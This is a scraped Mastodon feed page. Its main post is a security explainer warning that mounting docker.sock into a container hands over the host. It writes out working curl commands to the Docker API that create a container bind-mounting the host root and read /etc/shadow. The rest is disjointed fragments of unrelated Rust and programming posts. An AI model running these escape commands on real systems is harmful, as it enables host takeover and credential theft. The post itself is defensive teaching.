A grumpy ItSec guy walks through the office when he overhears an exchange of words.
devops0: I need to manage other containers on the node from my container, hmm...
devops1: Just mount /var/run/docker.sock into it and move on.
ItSec (walking by): Guys... a quick test. From inside that container, run:
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json
If you get JSON back, then you've handed that container admin-level control of the Docker daemon - so please don't...
devops0: So what? What does it mean?
Let's learn by example. The Docker CLI talks to the Docker daemon over a UNIX socket at (by default) /var/run/docker.sock [1]. That socket exposes the Docker Engine's REST API. With it, you can list, start, stop, create, or reconfigure containers - effectively controlling the host via the daemon. Now, the oops pattern we seeing:
# Dangerous: gives the container full control of the Docker daemon
docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:24.04
If an attacker gets any code execution in that container (RCE, webshell, deserialization bug, etc), they can pivot to the Docker host. Here's how in practice:
# 1) From the compromised container that "sees" docker.sock: create a "helper" container that bind-mounts the host root
# apt update && apt install -y curl
curl --unix-socket /var/run/docker.sock -H 'Content-Type: application/json' \
-X POST "http://localhost/containers/create?name=escape" \
-d '{
"Image": "ubuntu:24.04",
"Cmd": ["sleep","infinity"],
"HostConfig": { "Binds": ["/:/host:rw"] }
}'
# 2) Start it
curl --unix-socket /var/run/docker.sock -X POST http://localhost/containers/escape/start
From there, the attacker can shell in and operates on /host (add SSH keys, read secrets, drop binaries, whatever), or even chroots because why not:
# Read /etc/shadow of Docker Host using only curl, step 1:
curl --unix-socket /var/run/docker.sock -s \
-H 'Content-Type: application/json' \
-X POST http://localhost/containers/escape/exec \
-d '{
"AttachStdout": true,
"AttachStderr": true,
"Tty": true,
"Cmd": ["cat","/host/etc/shadow"]
}'
# Step 2, read output of previous command (replace exec ID with yours):
curl --unix-socket /var/run/docker.sock -s --no-buffer \
-H 'Content-Type: application/json' \
-X POST http://localhost/exec/1ec29063e5c13ac73b907f57470552dd39519bad293bf6677bedadaad9fcde89/start \
-d '{"Detach": false, "Tty": true}'
Keep in mind this isn't only an RCE issue: SSRF-style bugs can coerce internal services into calling local admin endpoints (including docker.sock or a TCP-exposed daemon).
And one more important point: we understand you may not like when texts like this include conditionals: if a container is compromised, if SSRF exists, then the socket becomes a bridge to owning the host. It's understandable. Our job, however, is to assume those "ifs" eventually happen and remove the easy paths for bad actors.
[1] https://docs.docker.com/reference/cli/dockerd/#daemon-socket-option
[2] https://docs.docker.com/engine/api/
Other grumpy stories:
1) https://infosec.exchange/@reynardsec/115048607028444198
2) https://infosec.exchange/@reynardsec/115014440095793678
3) https://infosec.exchange/@reynardsec/114912792051851956
#docker #devops #containers #security #kubernetes #cloud #infosec #sre #linux #php #nodejs #java #javascript #programming #cybersecurity #rust #python #js
# 
Some more silliness. 
🇺🇦
![Screenshot showing a part of ranking od program min languages. Scratch is at 17th position with ranking od 1.06% and rust is at 18th position (1.01%]](https://files.mastodon.social/media_attachments/files/114/897/252/281/450/694/original/39a846899e12ac00.png)
„Ratatui - Are We Embedded Yet?” talk is finally online!
(trying to change that) but I hope you like it.
;
くろでん
🚲 🇳🇱
with the 
Qiita - 人気の記事
![Rust compiler error message:
"error: does_halt computes if program halts, which is not allowed"
The shown code is a function taking a reference to a Program type and returning a Boolean that iterates over a proof iterator with flags requiring that the proofs prove either that the program halts or doesn’t. In the loop body, an if-else statement checks if the proof proves that the program halts or if it doesn’t and return true or false, respectively.
The error has additional details:
The function signature is highlighted in red:
"this computes if program halts"
The iterator (which spans multiple lines) is highlighted:
"note: because this will eventually yield..."
The return statements are highlighted with help suggesting replacing false with true or vice-versa to fix the error.
An assert and an unreachable are highlighted to indicate that they will never fail/run, respectively.
Finally:
note: #[deny(unreality)] on by default
note: consider using std::oracle<Halts> instead](https://ftp.ieji.de/mastodata/media_attachments/files/113/681/555/516/502/387/original/49af7033e5e4b55b.png)
, and an increasing interest in Elixir 
, I would appreciate it if you could point me to it!
![Rust Compiler output:
error[E0658]: default values on fields are experimental
--> def.rs:2:11
|
2 | x: i32 = 101,
| ^^^^^^
|
= note: see issue #132162 <https://github.com/rust-lang/rust/issues/132162> for more information
= help: add `#![feature(default_field_values)]` to the crate attributes to enable
= note: this compiler was built on 2024-12-10; consider upgrading it if it is out of date
error[E0797]: base expression required after `..`
--> def.rs:6:19
|
6 | let s = S { .. };
| ^
|
= help: add `#![feature(default_field_values)]` to the crate attributes to enable default values on `struct` fields
help: add a base expression here
|
6 | let s = S { ../* expr */ };
| ++++++++++](https://media.hachyderm.io/media_attachments/files/113/635/417/222/672/459/original/d9ec8030370c26b7.png)
![$ more def.rs
#![feature(default_field_values)]
struct S {
x: i32 = 101,
}
fn main() {
let s = S { .. };
println!("{}", s.x);
}
$ rustc +nightly def.rs && ./def
101](https://media.hachyderm.io/media_attachments/files/113/635/421/842/062/353/original/7bfe5ab368a9ac76.png)
, not to be confused with the 
, an entirely different and totally not grotesque thing). I wish everyone was in as privileged a position as I am, and could say the same.
) but it's on the roadmap so that should be fine pretty soon.
or in the 
![[moved] Floppy 💾's avatar](https://cdn.fosstodon.org/accounts/avatars/000/126/617/original/8ee710372071c74d.png){kind=small}
domenuk
and I see 
